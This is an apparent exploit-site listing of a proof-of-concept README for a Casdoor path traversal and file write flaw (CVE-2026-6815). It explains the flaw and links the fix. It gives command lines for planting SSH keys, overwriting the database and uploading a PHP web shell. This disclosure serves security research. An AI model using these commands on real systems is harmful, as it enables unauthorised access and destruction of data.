Exploit for Path Traversal in Casbin Casdoor CVE-2026-6815

Name: Exploit for Path Traversal in Casbin Casdoor CVE-2026-6815
Rating: 5 (5 reviews)
2026-06-04 | CVSS 5.9
## https://sploitus.com/exploit?id=B0271EB5-03B9-53A1-B97B-087C3883C5F6
# CVE-2026-6815: Casdoor <3.54.1 Path Traversal & Arbitrary File Write (Authenticated)

This repository contains a Proof of Concept (PoC) exploit for [CVE-2026-6815](https://www.kb.cert.org/vuls/id/937808), an arbitrary file write and path traversal vulnerability in [Casdoor](https://github.com/casdoor/casdoor).

The vulnerability has been [fixed](https://github.com/casdoor/casdoor/pull/5458) in version [3.54.1](https://github.com/casdoor/casdoor/releases/tag/v3.54.1). 

## Requirements
The attacker must be authenticated to the Casdoor instance with admin privileges or equivalent user having access to create and/or edit storage providers. 

## Impact
- **Remote Code Execution (RCE)**: By writing to sensitive locations like `.ssh/authorized_keys`, crontabs, or webroots.
- **Denial of Service (DoS)**: Overwriting application databases (`casdoor.db`) or core binaries with arbitrary files immediately stopping the application.

## Technical Details
Casdoor allows administrators to configure storage providers. The `Local File System` provider fails to properly sanitize the `pathPrefix` configuration and the `fullFilePath` parameter during resource uploads. 

By using directory traversal sequences (`../`), an authenticated administrator can escape the dedicated storage directory and write files anywhere the Casdoor process has permissions.

The vulnerability stems from insufficient path validation in:
- `object/provider.go`: No validation on `pathPrefix` during creation/update.
- `storage/local_file_system.go`: The `GetFullPath` method does not verify if the resolved path remains within the intended sandbox.

## Usage
1. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

2. Run the exploit:
   ```bash
   python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
   ```
## Usage Examples

### 1. SSH Key Injection for RCE
Write an attacker-controlled public key to the `authorized_keys` file of the `casdoor` user to gain SSH access.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys
```

### 2. Persistent DoS (Database Corruption)
Overwrite the application's local database file (e.g., `casdoor.db`) to cause a denial of service.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db
```

### 3. Web Shell Upload (Secondary Webroot)
If the server is hosting a secondary web server (e.g., Apache/Nginx) on the same filesystem, write a web shell into its document root.
```bash
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php
```

### 4. Custom Organization and Application
If you have administrative credentials for a specific organization and application (other than the defaults `built-in` and `app-built-in`), specify them using `--orgname` and `--appname`.
```bash
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt
```

## Disclaimer
This software is for educational and authorized security testing purposes only. The author is not responsible for any misuse of this information.

## Author
Vulnerability discovered and PoC developed by **[Danilo Dell'Orco](https://github.com/danilo-dellorco) (sixpain)**.